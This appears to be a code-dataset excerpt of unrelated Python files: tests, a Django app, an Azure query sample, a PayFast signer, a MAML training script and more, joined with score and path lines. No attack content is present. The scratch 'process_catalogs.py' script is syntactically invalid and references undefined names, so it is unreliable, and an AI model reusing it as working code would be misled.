assert State.from_payment_object(payment) == State.SABORT
payment2 = payment.new_version()
payment2.sender.add_additional_kyc_data("additional_kyc")
assert State.from_payment_object(payment2) == State.SABORT
payment3 = payment.new_version()
payment3.receiver.add_additional_kyc_data("additional_kyc")
assert State.from_payment_object(payment3) == State.SABORT
def test_READY(payment):
payment.sender.change_status(StatusObject(Status.ready_for_settlement))
payment.receiver.change_status(StatusObject(Status.ready_for_settlement))
assert State.from_payment_object(payment) == State.READY
payment2 = payment.new_version()
payment2.sender.add_additional_kyc_data("additional_kyc")
assert State.from_payment_object(payment2) == State.READY
payment3 = payment.new_version()
payment3.receiver.add_additional_kyc_data("additional_kyc")
assert State.from_payment_object(payment3) == State.READY
def test_RSOFT(payment):
payment.sender.change_status(StatusObject(Status.needs_kyc_data))
payment.receiver.change_status(StatusObject(Status.soft_match))
assert State.from_payment_object(payment) == State.RSOFT
payment3 = payment.new_version()
payment3.receiver.add_additional_kyc_data("additional_kyc")
with pytest.raises(InvalidStateException):
State.from_payment_object(payment3)
def test_SSOFTSEND(payment):
payment.sender.change_status(StatusObject(Status.needs_kyc_data))
payment.receiver.change_status(StatusObject(Status.soft_match))
payment.sender.add_additional_kyc_data("additional_kyc")
assert State.from_payment_object(payment) == State.SSOFTSEND
payment2 = payment.new_version()
payment2.receiver.add_additional_kyc_data("additional_kyc")
with pytest.raises(InvalidStateException):
State.from_payment_object(payment2)
def test_SSOFT(payment):
payment.sender.change_status(StatusObject(Status.soft_match))
payment.receiver.change_status(StatusObject(Status.ready_for_settlement))
assert State.from_payment_object(payment) == State.SSOFT
payment2 = payment.new_version()
payment2.sender.add_additional_kyc_data("additional_kyc")
assert State.from_payment_object(payment) == State.SSOFT
def test_RSOFTSEND(payment):
payment.sender.change_status(StatusObject(Status.soft_match))
payment.receiver.change_status(StatusObject(Status.ready_for_settlement))
payment.receiver.add_additional_kyc_data("additional_kyc")
assert State.from_payment_object(payment) == State.RSOFTSEND
payment2 = payment.new_version()
payment2.sender.add_additional_kyc_data("additional_kyc")
assert State.from_payment_object(payment) == State.RSOFTSEND
| 1.789063 | 2 |
src/design_patterns/strategy/application_runner.py | schuna/design-patterns-python | 0 | 12762505 | from design_patterns.strategy.fahrenheit_celsius_strategy import ConverterStrategy
class ApplicationRunner:
def __init__(self, application):
self.application = application
def run(self):
self.application.init()
while not self.application.done:
self.application.idle()
self.application.cleanup()
if __name__ == '__main__': # pragma: no cover
runner = ApplicationRunner(ConverterStrategy())
runner.run()
| 2.5625 | 3 |
scratch/test_dir3/process_catalogs.py | benw1/WINGS | 4 | 12762506 | #! /usr/bin/env python
import argparse,os,subprocess
from wpipe import *
from wingtips import WingTips as wtips
from wingtips import time, np, ascii
def register(PID,task_name):
myPipe = Pipeline.get(PID)
myTask = Task(task_name,myPipe).create()
_t = Task.add_mask(myTask,'*','start',task_name)
_t = Task.add_mask(myTask,'*','new_catalog','*')
return
def process_catalog(job_id,event_id):
myJob = Job.get(job_id)
myPipe = Pipeline.get(int(myJob.pipeline_id))
catalogID = Options.get('event',event_id)['dp_id']
catalogDP = DataProduct.get(int(cat_id))
myTarget = Target.get(int(catalogDP.target_id))
myConfig = Configuration.get(int(catalogDP.config_id))
myParams = Parameters.getParam(int(myConfig.config_id))
fileroot = str(catalogDP.relativepath)
filename = str(catalogDP.filename) # For example: 'h15.shell.5Mpc.in'
_t = subprocess.call(['cp',fileroot+'/'+filename,
myTarget.relativepath+'/proc_'+myConfig['name']+'/.',
stdout=subprocess.PIPE])
#
fileroot = myTarget.relativepath+'/proc_'+myConfig['name']+'/'
#filternames = myParams[filternames]
filternames = ['Z087','Y106','J129','H158','F184']
#ZP_AB = myParams[ZP_AB]
ZP_AB = np.array([26.365,26.357,26.320,26.367,25.913])
dist = float(infile.split('.')[2][:-3]) # We will have it in the config
starpre = '_'.join(infile.split('.')[:-1])
data = ascii.read(infile)
RA, DEC, M1, M2, M3, M4, M5 = \
data['col1'], data['col2'], data['col3'], data['col4'],\
data['col5'], data['col6'], data['col7']
M = np.array([M1,M2,M3,M4,M5]).T
stips_inputs = []
for j,filt in enumerate(filternames):
outfile = starpre+'_'+filt[0]+'.tbl'
flux = wtips.get_counts(M[:,j],ZP_AB[j],dist=dist)
# This makes a stars only input list
wtips.from_scratch(flux=flux,
ra=RA,dec=DEC,
outfile=fileroot+outfile)
_dp = DataProduct(filename=outfile,
relativepath=fileroot,
group='proc',subtype='star_cat',
configuration=myConfig)\
.create()
stars = wtips([fileroot+outfile])
galaxies = wtips([fileroot+filt+'_galaxies.txt']) # this file will be provided pre-made
galaxies.flux_to_Sb() # galaxy flux to surface brightness
radec = galaxies.random_radec_for(stars) # random RA DEC across star field
galaxies.replace_radec(radec) # distribute galaxies across starfield
stars.merge_with(galaxies) # merge stars and galaxies list
outfile = 'Mixed'+'_'+outfile
stars.write_stips(fileroot+outfile,ipac=True)
if j==0:
COnfiguration.addParam(myConfig,'RA', str(stars.center[0])
COnfiguration.addParam(myConfig,'DEC', str(stars.center[1]))
with open(fileroot+outfile, 'r+') as f:
content = f.read()
f.seek(0, 0)
f.write('\\type = internal' + '\n' +
'\\filter = ' + str(filt) +'\n' +
'\\center = (' + str(stars.center[0]) +
' ' + str(stars.center[1]) + ')\n' +
content)
_dp = DataProduct(filename=outfile,
relativepath=fileroot,
group='proc',subtype='stips_input'
configuration=myConfig)\
.create()
stips_inputs.append(_dp.dp_id)
event = Job.getEvent(myJob,'new_stips_input',
options={'dp_id': stips_inputs,
'to_run':int(len(stips_inputs)),
'completed': 0})
# This will start N run_stips jobs, one for each dp_id
# Event.fire(event)
Event.run_complete(Event.get(int(event_id)))
_parent = Options.get('event',event_id)
to_run,completed = int(_parent['to_run']), int(_parent['completed'])
if !(completed<to_run):
event = Job.getEvent(myJob,'process_catalogs_completed')
# Event.fire(event)
return None
def parse_all():
parser = argparse.ArgumentParser()
parser.add_argument('--R','-R', dest='REG', action='store_true',
help='Specify to Register')
parser.add_argument('--P','-p',type=int, dest='PID',
help='Pipeline ID')
parser.add_argument('--N','-n',type=str, dest='task_name',
help='Name of Task to be Registered')
parser.add_argument('--E','-e',type=int, dest='event_id',
help='Event ID')
parser.add_argument('--J','-j',type=int, dest='job_id',
help='Job ID')
parser.add_argument('--DP','-dp',type=int, dest='dp_id',
help='Dataproduct ID')
return parser.parse_args()
if __name__ == '__main__':
args = parse_all()
if args.REG:
_t = register(int(args.PID),str(args.task_name))
else:
job_id = int(args.job_id)
event_id = int(args.event_id)
dp_id = int(args.dp_id)
process_catalog(job_id,event_id,dp_id)
# placeholder for additional steps
print('done')
| 2.078125 | 2 |
brian2/tests/features/synapses.py | rgerkin/brian2 | 1 | 12762507 | <gh_stars>1-10
from __future__ import print_function
from __future__ import absolute_import
'''
Check that the features of `Synapses` are available and correct.
'''
from brian2 import *
from brian2.tests.features import FeatureTest, InaccuracyError
import numpy
class SynapsesPre(FeatureTest):
category = "Synapses"
name = "Presynaptic code"
tags = ["NeuronGroup", "run",
"Synapses", "Presynaptic code"]
def run(self):
tau = 5*ms
eqs = '''
dV/dt = k/tau : 1
k : 1
'''
G = NeuronGroup(10, eqs, threshold='V>1', reset='V=0')
G.k = linspace(1, 5, len(G))
H = NeuronGroup(10, 'V:1')
S = Synapses(G, H, on_pre='V += 1')
S.connect(j='i')
self.H = H
run(101*ms)
def results(self):
return self.H.V[:]
compare = FeatureTest.compare_arrays
class SynapsesPost(FeatureTest):
category = "Synapses"
name = "Postsynaptic code"
tags = ["NeuronGroup", "run",
"Synapses", "Postsynaptic code"]
def run(self):
tau = 5*ms
eqs = '''
dV/dt = k/tau : 1
k : 1
'''
G = NeuronGroup(10, eqs, threshold='V>1', reset='V=0')
G.k = linspace(1, 5, len(G))
H = NeuronGroup(10, 'V:1')
S = Synapses(H, G, on_post='V_pre += 1')
S.connect(j='i')
self.H = H
run(101*ms)
def results(self):
return self.H.V[:]
compare = FeatureTest.compare_arrays
class SynapsesSTDP(FeatureTest):
category = "Synapses"
name = "STDP"
tags = ["NeuronGroup", "Threshold", "Reset", "Refractory",
"run",
"Synapses", "Postsynaptic code", "Presynaptic code",
"SpikeMonitor", "StateMonitor",
"SpikeGeneratorGroup",
]
def run(self):
n_cells = 100
n_recorded = 10
numpy.random.seed(42)
taum = 20 * ms
taus = 5 * ms
Vt = -50 * mV
Vr = -60 * mV
El = -49 * mV
fac = (60 * 0.27 / 10)
gmax = 20*fac
dApre = .01
taupre = 20 * ms
taupost = taupre
dApost = -dApre * taupre / taupost * 1.05
dApost *= 0.1*gmax
dApre *= 0.1*gmax
connectivity = numpy.random.randn(n_cells, n_cells)
sources = numpy.random.random_integers(0, n_cells-1, 10*n_cells)
# Only use one spike per time step (to rule out that a single source neuron
# has more than one spike in a time step)
times = numpy.random.choice(numpy.arange(10*n_cells), 10*n_cells,
replace=False)*ms
v_init = Vr + numpy.random.rand(n_cells) * (Vt - Vr)
eqs = Equations('''
dv/dt = (g-(v-El))/taum : volt
dg/dt = -g/taus : volt
''')
P = NeuronGroup(n_cells, model=eqs, threshold='v>Vt', reset='v=Vr', refractory=5 * ms)
Q = SpikeGeneratorGroup(n_cells, sources, times)
P.v = v_init
P.g = 0 * mV
S = Synapses(P, P,
model = '''dApre/dt=-Apre/taupre : 1 (event-driven)
dApost/dt=-Apost/taupost : 1 (event-driven)
w : 1''',
pre = '''g += w*mV
Apre += dApre
w = w + Apost''',
post = '''Apost += dApost
w = w + Apre''')
S.connect()
S.w = fac*connectivity.flatten()
T = Synapses(Q, P, model = "w : 1", on_pre="g += w*mV")
T.connect(j='i')
T.w = 10*fac
spike_mon = SpikeMonitor(P)
state_mon = StateMonitor(S, 'w', record=np.arange(n_recorded))
v_mon = StateMonitor(P, 'v', record=np.arange(n_recorded))
self.state_mon = state_mon
self.spike_mon = spike_mon
self.v_mon = v_mon
run(0.2 * second, report='text')
def results(self):
return self.state_mon.w[:], self.v_mon.v[:], self.spike_mon.num_spikes
def compare(self, maxrelerr, res1, res2):
w1, v1, n1 = res1
w2, v2, n2 = res2
FeatureTest.compare_arrays(self, maxrelerr, w1, w2)
FeatureTest.compare_arrays(self, maxrelerr, v1, v2)
FeatureTest.compare_arrays(self, maxrelerr, array([n1], dtype=float),
array([n2], dtype=float))
if __name__=='__main__':
for ftc in [SynapsesPre, SynapsesPost]:
ft = ftc()
ft.run()
print(ft.results())
| 2.4375 | 2 |
update.py | Sssumika/lianjia | 0 | 12762508 | import json, os
labels = ['ID', '标题', '副标题', '总价', '总价单位', '均价', '小区名称', '所在区域', '房屋户型', '所在楼层', '建筑面积', '户型结构', '套内面积', '建筑类型',
'房屋朝向', '建筑结构', '装修情况', '梯户比例', '配备电梯', '产权年限', '挂牌时间', '交易权属', '上次交易', '房屋用途', '房屋年限', '产权所属', '抵押信息',
'房本备件', '房源标签', '税费解析', '交通出行', '核心卖点', '别墅类型', '售房详情', '周边配套', '小区介绍', '户型介绍', '装修描述', '权属抵押', '适宜人群',
'投资分析']
path1 = "data/"
path2 = "data2/"
files = os.listdir(path1)
for i in files:
with open(path1+i, 'r') as file:
tmp = json.load(file)
for j in range(len(tmp)):
for key in labels:
if key not in tmp[j]:
tmp[j][key] = ''
with open(path2+i, 'w') as file:
json.dump(tmp, file)
| 2.359375 | 2 |
Blog/apps/articles/forms.py | singhabhigkp77/Django-Blog | 0 | 12762509 | from django.forms import ModelForm
from .models import Post
# Create the form class.
class ArticleForm(ModelForm):
class Meta:
model = Post
fields = [ 'title', 'text', 'created_date']
def clean(self):
cleaned_data = super(ArticleForm, self).clean()
| 2.40625 | 2 |
mowl/examples/wro.py | bio-ontology-research-group/OntoML | 0 | 12762510 | <filename>mowl/examples/wro.py
#!/usr/bin/env python
import click as ck
import numpy as np
import pandas as pd
import pickle
import gzip
import os
import sys
import logging
logging.basicConfig(level=logging.INFO)
sys.path.insert(0, '')
sys.path.append('../../')
from mowl.datasets import PPIYeastDataset
from mowl.graph.walking_rdf_and_owl.model import WalkRdfOwl
@ck.command()
def main():
logging.info(f"Number of cores detected: {os.cpu_count()}")
ds = PPIYeastDataset()
model = WalkRdfOwl(ds, 'walk_rdf_corpus.txt', 'walk_rdf_embeddings.wordvectors',
number_walks = 10, #500,
length_walk = 5,# 40,
embedding_size= 10, #256,
window = 5,
min_count = 5,
data_root = "../data")
model.train()
# relations = ['has_interaction']
# model.evaluate(relations)
if __name__ == '__main__':
main()
| 2.484375 | 2 |
chapter6/hello_debug_object_pdb.py | paiml/testing-in-python | 7 | 12762511 | <gh_stars>1-10
class Z: pass
zz = Z()
def add(x,y):
import pdb;pdb.set_trace()
print(f"The value of x: {x}")
print(f"The value of y: {y}")
return x+y
result = add(3,zz)
print(result) | 3.078125 | 3 |
sdk/monitor/azure-monitor-query/samples/sample_logs_query_key_value_form.py | rsdoherty/azure-sdk-for-python | 0 | 12762512 | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import os
import pandas as pd
from datetime import datetime, timedelta
from msrest.serialization import UTC
from azure.monitor.query import LogsQueryClient
from azure.identity import DefaultAzureCredential
credential = DefaultAzureCredential()
client = LogsQueryClient(credential)
# Response time trend
# request duration over the last 12 hours.
query = """AppRequests |
summarize avgRequestDuration=avg(DurationMs) by bin(TimeGenerated, 10m), _ResourceId"""
# returns LogsQueryResult
response = client.query_workspace(os.environ['LOG_WORKSPACE_ID'], query, timespan=timedelta(days=1))
try:
table = response.tables[0]
df = pd.DataFrame(table.rows, columns=[col.name for col in table.columns])
key_value = df.to_dict(orient='records')
print(key_value)
except TypeError:
print(response.error)
"""
[
{
'TimeGenerated': '2021-07-21T04:40:00Z',
'_ResourceId': '/subscriptions/faa080af....',
'avgRequestDuration': 19.7987
},
{
'TimeGenerated': '2021-07-21T04:50:00Z',
'_ResourceId': '/subscriptions/faa08....',
'avgRequestDuration': 33.9654
},
{
'TimeGenerated': '2021-07-21T05:00:00Z',
'_ResourceId': '/subscriptions/faa080....',
'avgRequestDuration': 44.13115
}
]
"""
| 2.28125 | 2 |
src/data_hub/lore/viewsets.py | TNRIS/api.tnris.org | 6 | 12762513 | <reponame>TNRIS/api.tnris.org
from rest_framework import viewsets
from rest_framework.response import Response
from .models import County, CountyRelate, Product, Collection, ChcView
from .serializers import (CountySerializer, ProductSerializer,
CollectionSerializer)
from rest_framework.permissions import AllowAny
import boto3
class CountyViewSet(viewsets.ReadOnlyModelViewSet):
"""
Retrieve Texas county names & FIPS codes
"""
queryset = County.objects.all()
serializer_class = CountySerializer
http_method_names = ['get']
class ProductViewSet(viewsets.ReadOnlyModelViewSet):
"""
Retrieve TNRIS historical imagery collection physical products information
"""
serializer_class = ProductSerializer
http_method_names = ['get']
def get_queryset(self):
fips = self.request.query_params.get('countyFips')
if fips:
county = County.objects.get(fips=fips)
collections = (
CountyRelate.objects.filter(county=county.id)
.select_related("collection")
)
public_recs = Collection.objects.filter(public=True)
queryset = (Product.objects.filter(collection_id__in=collections.values_list("collection"))
.filter(collection_id__in=public_recs.values_list("id")).select_related("collection"))
else:
queryset = Product.objects.select_related("collection")
return queryset
class CollectionViewSet(viewsets.ReadOnlyModelViewSet):
"""
Retrieve TNRIS historical imagery collection metadata & information
"""
serializer_class = CollectionSerializer
http_method_names = ['get']
def get_queryset(self):
args = {'public': True}
null_list = ['null', 'Null', 'none', 'None']
# create argument object of query clauses
for field in self.request.query_params.keys():
if field != 'limit' and field != 'offset':
value = self.request.query_params.get(field)
# convert null queries
if value in null_list:
value = None
args[field] = value
# get records using query
queryset = ChcView.objects.filter(**args).order_by('collection_id')
return queryset
class MapserverViewSet(viewsets.ViewSet):
"""
Retrieve TNRIS mapserver instance mapfiles list from S3 content objects
"""
# *******************************************************************
# *** this endpoint is not currently used by any of our apps/pages ***
# *******************************************************************
# This is an alternative, direct-from-s3 (what services truly exist) list of
# mapserver service URLs. Same information can be/currently is retrieved by using the
# '<index,frames,mosaic>_service_url' fields from the /api/v1/historical/collections
# endpoint but if the LORE database and those fields are not properly populated,
# then that result will be different from this endpoint
permission_classes = (AllowAny,)
def list(self, request):
client = boto3.client('s3')
keys = []
def get_mapfiles(token):
if token == '':
response = client.list_objects_v2(
Bucket='tnris-mapserver',
Prefix='mapfiles/'
)
else:
response = client.list_objects_v2(
Bucket='tnris-mapserver',
Prefix='mapfiles/',
ContinuationToken=token
)
goods = [x['Key'] for x in response['Contents'] if x['Key'] != 'mapfiles/']
keys.extend(goods)
if 'NextContinuationToken' in response.keys():
get_mapfiles(response['NextContinuationToken'])
else:
return keys
get_mapfiles('')
all_keys = keys
for key in all_keys:
key_obj = {}
pos = all_keys.index(key)
name = key.replace('mapfiles/', '').replace('.map', '')
key_obj['name'] = name
key_obj['label'] = name.replace("_", " ").title()
key_obj['wms'] = 'https://mapserver.tnris.org/?map=/' + key
if len(name.split("_")) == 4:
key_obj['org'] = 'county'
one = name.split("_")[0]
two = name.split("_")[1]
three = name.split("_")[2]
four = name.split("_")[3]
key_obj['county'] = one
key_obj['agency'] = two
key_obj['year'] = three
key_obj['type'] = four
key_obj['mission'] = 'n/a'
elif len(name.split("_")) == 3:
key_obj['org'] = 'multi'
one = name.split("_")[0]
two = name.split("_")[1]
three = name.split("_")[2]
key_obj['county'] = 'MULTIPLE'
key_obj['agency'] = one
key_obj['year'] = ''
key_obj['type'] = three
key_obj['mission'] = two
all_keys[pos] = key_obj
return Response(all_keys)
| 2.046875 | 2 |
payfast/signer.py | zengoma/django-oscar-payfast | 0 | 12762514 | <filename>payfast/signer.py
# -*- coding: utf-8 -*-
"""Signers are helpers to sign and verify Payfast requests & responses.
There is currently one type of signature:
* MD5
This class could be modified in future should payfast implement other signature methods eg SHA.
.. note::
**About the signature:**
The data passed in the form fields, is parsed into a url encoded querystring,
referred to as the “signing string”. The signature is then generated
and optionally "salted" using the PAYFAST_PASSPHRASE setting.
The signature is passed along with the form data and once Payfast receives it
they use the key to verify that the data has not been tampered with in
transit.
The signing string should be packed into a binary format containing hex
characters, and then encoded for transmission.
"""
import hashlib
try:
# Python > 3
import urllib.parse as parse
except ImportError:
# Python < 3
import urllib as parse
from payfast.constants import Constants
from .config import get_config
class AbstractSigner:
"""Abstract base class that define the common interface.
A signer must expose three methods:
* :meth:`sign`: take form fields and return a dict of signature fields.
* :meth:`verify`: take a dict of fields and make sure there have an
appropriate signature field.
* :meth:`genetrate_hash`: take a signature string and compute its hash value.
These methods are not implementd by the :class:`AbstractSigner`, therefore
subclasses **must** implement them.
"""
def sign(self, fields):
"""Sign the given form ``fields`` and return the signature fields.
:param dict fields: The form fields used to perform a payment request
:return: A dict of signature fields
:rtype: ``dict``
A payment request form must contains specific signature fields,
depending on the selected sign method.
"""
raise NotImplementedError
def verify(self, fields):
"""Verify ``fields`` contains the appropriate signatures.
:param dict fields: A dict of fields, given by a payment return
response or by a payment notification.
:return: ``True`` the ``fields`` contain valid signatures
:rtype: ``boolean``
"""
raise NotImplementedError
def genetrate_hash(self, signature_string):
"""Return a hash for the given ``signature_string``.
:param str signature_string: A ``signature_string`` used to generate a signature.
:return: str siganture: A hashed version of the ``signature_string`` using the
:attr:`PAYFAST_PASSPHRASE` if it has been assigned in the settings folder.
The md5 hashing algorithm is used to sign the ``signature_string`` string. This method is not supposed to know how
the ``signature_string`` is built. A secret 'PAYFAST_PASSPHRASE' can be used to salt the hash and compensate for
some of the known md5 vulnerabilities.
"""
raise NotImplementedError
class MD5Signer(AbstractSigner):
"""Implement a MD5 signature.
.. seealso::
The Payfast documentation about `MD5 siganture generation`__ for an explanation
on generating the signature.
.. __: https://developers.payfast.co.za/documentation/#checkout-page
"""
REQUEST_HASH_KEYS = (
Constants.MERCHANT_ID,
Constants.MERCHANT_KEY,
Constants.RETURN_URL,
Constants.CANCEL_URL,
Constants.NOTIFY_URL,
Constants.NAME_FIRST,
Constants.NAME_LAST,
Constants.EMAIL_ADDRESS,
Constants.CELL_NUMBER,
Constants.M_PAYMENT_ID,
Constants.AMOUNT,
Constants.ITEM_NAME,
Constants.ITEM_DESCRIPTION,
Constants.EMAIL_CONFIRMATION,
Constants.CONFIRMATION_ADDRESS
)
"""An ordered tuple of possible request keys
This is used to build or verify the payfast signature before the user is directed to the payfast gateway.
Note that the order of the fields matter to generate the hash with the MD5 algorithm.
"""
RESPONSE_HASH_KEYS = (
Constants.M_PAYMENT_ID,
Constants.PF_PAYMENT_ID,
Constants.PAYMENT_STATUS,
Constants.ITEM_NAME,
Constants.ITEM_DESCRIPTION,
Constants.AMOUNT_GROSS,
Constants.AMOUNT_FEE,
Constants.AMOUNT_NET,
Constants.NAME_FIRST,
Constants.NAME_LAST,
Constants.EMAIL_ADDRESS,
Constants.MERCHANT_ID
)
"""An ordered tuple of possible response/notification keys
This is used to build or verify the payfast signature that is by payfast to the ITN endpoint. Note that the order of
the fields matter to generate the hash with the MD5 algorithm.
"""
def sign(self, fields):
"""Sign the given form ``fields`` and return the signature field.
:param dict fields: A dictionary of request fields
:returns str signature: The signature to be send with the payfast request
.. seealso::
The :meth:`AbstractSigner.sign` method for usage.
"""
signature_list = [(key, fields[key]) for key in self.REQUEST_HASH_KEYS if fields.get(key, None)]
signature_string = parse.urlencode(signature_list)
signature = self.generate_hash(signature_string)
return signature
def verify(self, fields):
"""Verify ``fields`` contains the appropriate signature response from payfast.
:param dict fields: A dictionary of request fields
:returns bool: returns True only if the signature from the payfast server is valid, else returns False
.. seealso::
The :meth:`AbstractSigner.verify` method for usage.
"""
response_signature = fields.pop('signature', None)
signature_list = [(key, fields[key]) for key in self.RESPONSE_HASH_KEYS if fields.get(key, None)]
signature_string = parse.urlencode(signature_list)
signature = self.generate_hash(signature_string)
return signature == response_signature
def generate_hash(self, signature_string):
"""Generate the hash using the ``hashlib.md5`` algorithm.
.. seealso::
The :meth:`AbstractSigner.genetrate_hash` method for usage.
"""
if get_config().get_passphrase():
signature_string += '&passphrase=' + parse.quote(get_config().get_passphrase())
return hashlib.md5(signature_string.encode()).hexdigest()
| 2.984375 | 3 |
pbo1-project/Orders/__init__.py | hifra01/PBO1-Project | 0 | 12762515 | <filename>pbo1-project/Orders/__init__.py
from .Order import Order
| 1.210938 | 1 |
PP4E/Examples/PP4E/Preview/dump_db_pickle.py | BeacherHou/Python-_Markdown- | 0 | 12762516 | import pickle
dbfile = open('people-pickle', 'rb') # use binary mode files in 3.X
db = pickle.load(dbfile)
for key in db:
print(key, '=>\n ', db[key])
print(db['sue']['name'])
| 2.984375 | 3 |
main.py | dkkim93/pytorch-maml | 0 | 12762517 | import torch
import argparse
import os
import random
import numpy as np
from tensorboardX import SummaryWriter
from misc.utils import set_log, visualize
from torch.optim import SGD, Adam
from torch.nn.modules.loss import MSELoss
from inner_loop import InnerLoop
from omniglot_net import OmniglotNet
from score import *
from misc.batch_sampler import BatchSampler
from misc.replay_buffer import ReplayBuffer
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class MetaLearner(object):
def __init__(self, log, tb_writer, args):
super(self.__class__, self).__init__()
self.log = log
self.tb_writer = tb_writer
self.args = args
self.loss_fn = MSELoss()
self.net = OmniglotNet(self.loss_fn, args).to(device)
self.fast_net = InnerLoop(self.loss_fn, args).to(device)
self.opt = Adam(self.net.parameters(), lr=args.meta_lr)
self.sampler = BatchSampler(args)
self.memory = ReplayBuffer()
def meta_update(self, episode_i, ls):
in_ = episode_i.observations[:, :, 0]
target = episode_i.rewards[:, :, 0]
# We use a dummy forward / backward pass to get the correct grads into self.net
loss, out = forward_pass(self.net, in_, target)
# Unpack the list of grad dicts
gradients = {k: sum(d[k] for d in ls) for k in ls[0].keys()}
# Register a hook on each parameter in the net that replaces the current dummy grad
# with our grads accumulated across the meta-batch
hooks = []
for (k, v) in self.net.named_parameters():
def get_closure():
key = k
def replace_grad(grad):
return gradients[key]
return replace_grad
hooks.append(v.register_hook(get_closure()))
# Compute grads for current step, replace with summed gradients as defined by hook
self.opt.zero_grad()
loss.backward()
# Update the net parameters with the accumulated gradient according to optimizer
self.opt.step()
# Remove the hooks before next training phase
for h in hooks:
h.remove()
def test(self, i_task, episode_i_):
predictions_ = []
for i_agent in range(self.args.n_agent):
test_net = OmniglotNet(self.loss_fn, self.args).to(device)
# Make a test net with same parameters as our current net
test_net.copy_weights(self.net)
test_opt = SGD(test_net.parameters(), lr=self.args.fast_lr)
episode_i = self.memory.storage[i_task - 1]
# Train on the train examples, using the same number of updates as in training
for i in range(self.args.fast_num_update):
in_ = episode_i.observations[:, :, i_agent]
target = episode_i.rewards[:, :, i_agent]
loss, _ = forward_pass(test_net, in_, target)
print("loss {} at {}".format(loss, i_task))
test_opt.zero_grad()
loss.backward()
test_opt.step()
# Evaluate the trained model on train and val examples
tloss, _ = evaluate(test_net, episode_i, i_agent)
vloss, prediction_ = evaluate(test_net, episode_i_, i_agent)
mtr_loss = tloss / 10.
mval_loss = vloss / 10.
print('-------------------------')
print('Meta train:', mtr_loss)
print('Meta val:', mval_loss)
print('-------------------------')
del test_net
predictions_.append(prediction_)
visualize(episode_i, episode_i_, predictions_, i_task, self.args)
def train(self):
for i_task in range(10000):
# Sample episode from current task
self.sampler.reset_task(i_task)
episodes = self.sampler.sample()
# Add to memory
self.memory.add(i_task, episodes)
# Evaluate on test tasks
if len(self.memory) > 1:
self.test(i_task, episodes)
# Collect a meta batch update
if len(self.memory) > 2:
meta_grads = []
for i in range(self.args.meta_batch_size):
if i == 0:
episodes_i = self.memory.storage[i_task - 1]
episodes_i_ = self.memory.storage[i_task]
else:
episodes_i, episodes_i_ = self.memory.sample()
self.fast_net.copy_weights(self.net)
for i_agent in range(self.args.n_agent):
meta_grad = self.fast_net.forward(episodes_i, episodes_i_, i_agent)
meta_grads.append(meta_grad)
# Perform the meta update
self.meta_update(episodes_i, meta_grads)
def main(args):
# Create dir
if not os.path.exists("./logs"):
os.makedirs("./logs")
if not os.path.exists("./pytorch_models"):
os.makedirs("./pytorch_models")
# Set logs
tb_writer = SummaryWriter('./logs/tb_{0}'.format(args.log_name))
log = set_log(args)
# Set seeds
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if device == torch.device("cuda"):
torch.cuda.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
# Set the gpu
learner = MetaLearner(log, tb_writer, args)
learner.train()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="")
# General
parser.add_argument(
"--policy-type", type=str,
choices=["discrete", "continuous", "normal"],
help="Policy type available only for discrete, normal, and continuous")
parser.add_argument(
"--learner-type", type=str,
choices=["meta", "finetune"],
help="Learner type available only for meta, finetune")
parser.add_argument(
"--n-hidden", default=64, type=int,
help="Number of hidden units")
parser.add_argument(
"--n-traj", default=1, type=int,
help="Number of trajectory to collect from each task")
# Meta-learning
parser.add_argument(
"--meta-batch-size", default=25, type=int,
help="Number of tasks to sample for meta parameter update")
parser.add_argument(
"--fast-num-update", default=5, type=int,
help="Number of updates for adaptation")
parser.add_argument(
"--meta-lr", default=0.03, type=float,
help="Meta learning rate")
parser.add_argument(
"--fast-lr", default=10.0, type=float,
help="Adaptation learning rate")
parser.add_argument(
"--first-order", action="store_true",
help="Adaptation learning rate")
# Env
parser.add_argument(
"--env-name", default="", type=str,
help="OpenAI gym environment name")
parser.add_argument(
"--ep-max-timesteps", default=10, type=int,
help="Episode is terminated when max timestep is reached.")
parser.add_argument(
"--n-agent", default=1, type=int,
help="Number of agents in the environment")
# Misc
parser.add_argument(
"--seed", default=0, type=int,
help="Sets Gym, PyTorch and Numpy seeds")
parser.add_argument(
"--prefix", default="", type=str,
help="Prefix for tb_writer and logging")
args = parser.parse_args()
# Set log name
args.log_name = \
"env::%s_seed::%s_learner_type::%s_meta_batch_size::%s_meta_lr::%s_fast_num_update::%s_" \
"fast_lr::%s_prefix::%s_log" % (
args.env_name, str(args.seed), args.learner_type, args.meta_batch_size, args.meta_lr,
args.fast_num_update, args.fast_lr, args.prefix)
main(args=args)
| 2.015625 | 2 |
pyschool/static/libs/importhooks/localstorage.py | niansa/brython-in-the-classroom | 14 | 12762518 | <gh_stars>10-100
import BaseHook
from browser.local_storage import storage
import sys
#define my custom import hook (just to see if it get called etc).
class LocalStorageHook(BaseHook.BaseHook):
def __init__(self, fullname, path):
BaseHook.BaseHook.__init__(self, fullname, path)
#self._fullname=fullname
#self._path=path
#self._modpath=None
def find_module(self):
for _ext in ('.py', '/__init__.py'):
try:
self._modpath='%s/%s%s' % (self._path, self._fullname, _ext)
self._module=storage[self._modpath]
return self
except:
pass
#if we got here, we couldn't find the module
raise ImportError
sys.meta_path.append(LocalStorageHook)
| 2.28125 | 2 |
solutions/733.floodFill.py | lim1202/LeetCodeProblems | 0 | 12762519 | """
733. Flood Fill
An image is represented by an m x n integer grid image where image[i][j] represents the pixel value of the image.
You are also given three integers sr, sc, and newColor. You should perform a flood fill on the image starting from the pixel image[sr][sc].
To perform a flood fill, consider the starting pixel, plus any pixels connected 4-directionally to the starting pixel of the same color as the starting pixel, plus any pixels connected 4-directionally to those pixels (also with the same color), and so on. Replace the color of all of the aforementioned pixels with newColor.
Return the modified image after performing the flood fill.
Example 1:
Input: image = [[1,1,1],[1,1,0],[1,0,1]], sr = 1, sc = 1, newColor = 2
Output: [[2,2,2],[2,2,0],[2,0,1]]
Explanation: From the center of the image with position (sr, sc) = (1, 1) (i.e., the red pixel), all pixels connected by a path of the same color as the starting pixel (i.e., the blue pixels) are colored with the new color.
Note the bottom corner is not colored 2, because it is not 4-directionally connected to the starting pixel.
Example 2:
Input: image = [[0,0,0],[0,0,0]], sr = 0, sc = 0, newColor = 2
Output: [[2,2,2],[2,2,2]]
Constraints:
m == image.length
n == image[i].length
1 <= m, n <= 50
0 <= image[i][j], newColor < 216
0 <= sr < m
0 <= sc < n
